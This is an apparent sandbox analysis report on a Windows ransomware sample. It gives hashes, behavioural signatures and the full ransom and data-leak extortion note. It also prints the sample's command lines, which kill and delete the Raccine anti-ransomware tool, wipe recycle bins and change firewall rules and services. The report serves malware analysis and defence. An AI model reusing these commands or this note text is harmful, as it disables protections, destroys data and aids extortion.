Analysis
-
max time kernel
83s -
max time network
202s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
06-09-2021 07:33
Static task
static1
Behavioral task
behavioral1
Sample
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
Resource
win10-en
General
-
Target
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
-
Size
254KB
-
MD5
d70181d031e35f86d26be56d230b7d4e
-
SHA1
27ad13e49541f0f9806a21ea825aab95fba11608
-
SHA256
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3
-
SHA512
ad97d1a955f864751ac7243c54d3c611507f7c541aa4a9761ff7b587545a3aee0d23faa24ecd983f71458b9307197cf062181dd51503cc05a6a3f741162cfb2e
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
https://privatlab.com/file
http://sonarmsniko2lvfu.onion/?a=reg
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
https://privatlab.com/file
http://sonarmsniko2lvfu.onion/?a=reg
Signatures
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exeflow pid process 8 3984 mshta.exe 9 3984 mshta.exe 10 3984 mshta.exe 11 3984 mshta.exe 12 3984 mshta.exe 14 3984 mshta.exe -
Modifies Windows Firewall 1 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 4532 cmd.exe -
Drops startup file 1 IoCs
Processes:
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 1596 icacls.exe 2588 icacls.exe 2076 icacls.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "!!! ALL YOUR FILES ARE ENCRYPTED !!!\r\n\r\nAll your files, documents, photos, databases and other important files are encrypted.\r\n\r\nYou are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.\r\nOnly we can give you this key and only we can recover your files.\r\n\r\n!!!!!!!!! We backed up all your documents and databases.\r\nIF YOU NOT START DIALOGUE WITH US, WE WILL POST ALL YOUR DOCUMENTS AND DATABASES ON INTERNET. !!!!!!!!!\r\n\r\nWe recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files.\r\n* Please note that files must not contain any valuable information.\r\n\r\nDo you really want to restore your files?\r\n\r\n1) Using a TOR browser!\r\na) Download and install TOR browser from this site: https://torproject.org/\r\nb) Open website: http://sonarmsniko2lvfu.onion/?a=reg\r\nc) Register account\u00a0\r\nd) Click Compose\u00a0 and write to us, our username: Prometheus, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]]) and link to 3 encrypted files in https://privatlab.com/file\r\n\r\n2) Using a email\r\nWrite to 3 emails address at once, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]])\u00a0and link to 3 encrypted files in https://privatlab.com/file :\r\[email protected]\r\[email protected]\r\[email protected]\r\n\r\nWe recommend using 1 method via TOR browser to contact us.\r\nEmail letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1.\r\n\r\n* Do not rename encrypted files.\r\n* Do not try to decrypt your data using third party software, it may cause permanent data loss.\r\n* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\r\n* For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!" 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 844 taskkill.exe 3832 taskkill.exe 2072 taskkill.exe 2088 taskkill.exe 788 taskkill.exe 3204 taskkill.exe 2188 taskkill.exe 1092 taskkill.exe 3272 taskkill.exe 3052 taskkill.exe 3068 taskkill.exe 3196 taskkill.exe 1328 taskkill.exe 1308 taskkill.exe 3240 taskkill.exe 3108 taskkill.exe 2968 taskkill.exe 2960 taskkill.exe 3004 taskkill.exe 2172 taskkill.exe 2924 taskkill.exe 2452 taskkill.exe 3672 taskkill.exe 2284 taskkill.exe 1260 taskkill.exe 3020 taskkill.exe 2772 taskkill.exe 2900 taskkill.exe 2340 taskkill.exe 1892 taskkill.exe 1600 taskkill.exe 3140 taskkill.exe 2876 taskkill.exe 3028 taskkill.exe 2316 taskkill.exe 2756 taskkill.exe 2332 taskkill.exe 3152 taskkill.exe 2104 taskkill.exe 2460 taskkill.exe 3424 taskkill.exe 816 taskkill.exe 3848 taskkill.exe 3076 taskkill.exe 3864 taskkill.exe 3036 taskkill.exe 1804 taskkill.exe 2788 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exepid process 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe Token: SeDebugPrivilege 1892 taskkill.exe Token: SeDebugPrivilege 2088 taskkill.exe Token: SeDebugPrivilege 2924 taskkill.exe Token: SeDebugPrivilege 3140 taskkill.exe Token: SeDebugPrivilege 3152 taskkill.exe Token: SeDebugPrivilege 2900 taskkill.exe Token: SeDebugPrivilege 2340 taskkill.exe Token: SeDebugPrivilege 3424 taskkill.exe Token: SeDebugPrivilege 816 taskkill.exe Token: SeDebugPrivilege 3864 taskkill.exe Token: SeDebugPrivilege 2772 taskkill.exe Token: SeDebugPrivilege 2188 taskkill.exe Token: SeDebugPrivilege 2756 taskkill.exe Token: SeDebugPrivilege 3028 taskkill.exe Token: SeDebugPrivilege 2332 taskkill.exe Token: SeDebugPrivilege 3004 taskkill.exe Token: SeDebugPrivilege 3848 taskkill.exe Token: SeDebugPrivilege 2876 taskkill.exe Token: SeDebugPrivilege 2316 taskkill.exe Token: SeDebugPrivilege 3052 taskkill.exe Token: SeDebugPrivilege 3068 taskkill.exe Token: SeDebugPrivilege 1328 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 1804 taskkill.exe Token: SeDebugPrivilege 3272 taskkill.exe Token: SeDebugPrivilege 1092 taskkill.exe Token: SeDebugPrivilege 2072 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 2452 taskkill.exe Token: SeDebugPrivilege 2104 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 2284 taskkill.exe Token: SeDebugPrivilege 3832 taskkill.exe Token: SeDebugPrivilege 3204 taskkill.exe Token: SeDebugPrivilege 844 taskkill.exe Token: SeDebugPrivilege 3672 taskkill.exe Token: SeDebugPrivilege 3036 taskkill.exe Token: SeDebugPrivilege 1308 taskkill.exe Token: SeDebugPrivilege 2172 taskkill.exe Token: SeDebugPrivilege 788 taskkill.exe Token: SeDebugPrivilege 1260 taskkill.exe Token: SeDebugPrivilege 3020 taskkill.exe Token: SeDebugPrivilege 3240 taskkill.exe Token: SeDebugPrivilege 3076 taskkill.exe Token: SeDebugPrivilege 3108 taskkill.exe Token: SeDebugPrivilege 3196 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exepid process 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exepid process 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exedescription pid process target process PID 520 wrote to memory of 1892 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe taskkill.exe PID 520 wrote to memory of 1892 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe taskkill.exe PID 520 wrote to memory of 1892 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe taskkill.exe PID 520 wrote to memory of 744 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe reg.exe PID 520 wrote to memory of 744 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe reg.exe PID 520 wrote to memory of 744 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe reg.exe PID 520 wrote to memory of 620 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe reg.exe PID 520 wrote to memory of 620 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe reg.exe PID 520 wrote to memory of 620 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe reg.exe PID 520 wrote to memory of 1684 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe schtasks.exe PID 520 wrote to memory of 1684 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe schtasks.exe PID 520 wrote to memory of 1684 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe schtasks.exe PID 520 wrote to memory of 1692 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe cmd.exe PID 520 wrote to memory of 1692 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe cmd.exe PID 520 wrote to memory of 1692 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe cmd.exe PID 520 wrote to memory of 1952 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe cmd.exe PID 520 wrote to memory of 1952 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe cmd.exe PID 520 wrote to memory of 1952 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe cmd.exe PID 520 wrote to memory of 1296 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe netsh.exe PID 520 wrote to memory of 1296 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe netsh.exe PID 520 wrote to memory of 1296 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe netsh.exe PID 520 wrote to memory of 1260 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe netsh.exe PID 520 wrote to memory of 1260 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe netsh.exe PID 520 wrote to memory of 1260 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe netsh.exe PID 520 wrote to memory of 1308 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1308 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1308 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 112 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 112 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 112 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 864 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 864 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 864 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 968 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 968 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 968 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1536 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1536 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1536 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1168 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1168 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1168 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1328 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1328 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 1328 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 904 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 904 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 904 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe sc.exe PID 520 wrote to memory of 960 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 960 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 960 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1140 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1140 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1140 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1964 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1964 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1964 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1164 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1164 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1164 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1248 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1248 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 1248 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe PID 520 wrote to memory of 828 520 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe net.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..." 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "!!! ALL YOUR FILES ARE ENCRYPTED !!!\r\n\r\nAll your files, documents, photos, databases and other important files are encrypted.\r\n\r\nYou are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.\r\nOnly we can give you this key and only we can recover your files.\r\n\r\n!!!!!!!!! We backed up all your documents and databases.\r\nIF YOU NOT START DIALOGUE WITH US, WE WILL POST ALL YOUR DOCUMENTS AND DATABASES ON INTERNET. !!!!!!!!!\r\n\r\nWe recommend you upload 3 encrypted files in https://privatlab.com/file and paste link to you message. We will demonstrate that we can recover your files.\r\n* Please note that files must not contain any valuable information.\r\n\r\nDo you really want to restore your files?\r\n\r\n1) Using a TOR browser!\r\na) Download and install TOR browser from this site: https://torproject.org/\r\nb) Open website: http://sonarmsniko2lvfu.onion/?a=reg\r\nc) Register account\u00a0\r\nd) Click Compose\u00a0 and write to us, our username: Prometheus, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]]) and link to 3 encrypted files in https://privatlab.com/file\r\n\r\n2) Using a email\r\nWrite to 3 emails address at once, in message write Your key identifier (it is at the end of file) and file extension (forexample .TEST[[email protected]])\u00a0and link to 3 encrypted files in https://privatlab.com/file :\r\[email protected]\r\[email protected]\r\[email protected]\r\n\r\nWe recommend using 1 method via TOR browser to contact us.\r\nEmail letters may not reach us. Therefore, if you do not receive a response within 12 hours, please use method 1.\r\n\r\n* Do not rename encrypted files.\r\n* Do not try to decrypt your data using third party software, it may cause permanent data loss.\r\n* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\r\n* For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!" 52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe"C:\Users\Admin\AppData\Local\Temp\52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:520 -
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:744
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:620
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1684
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1692
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:1952
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1296
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:1260
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:1308
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:112
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:864
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:968
-
-
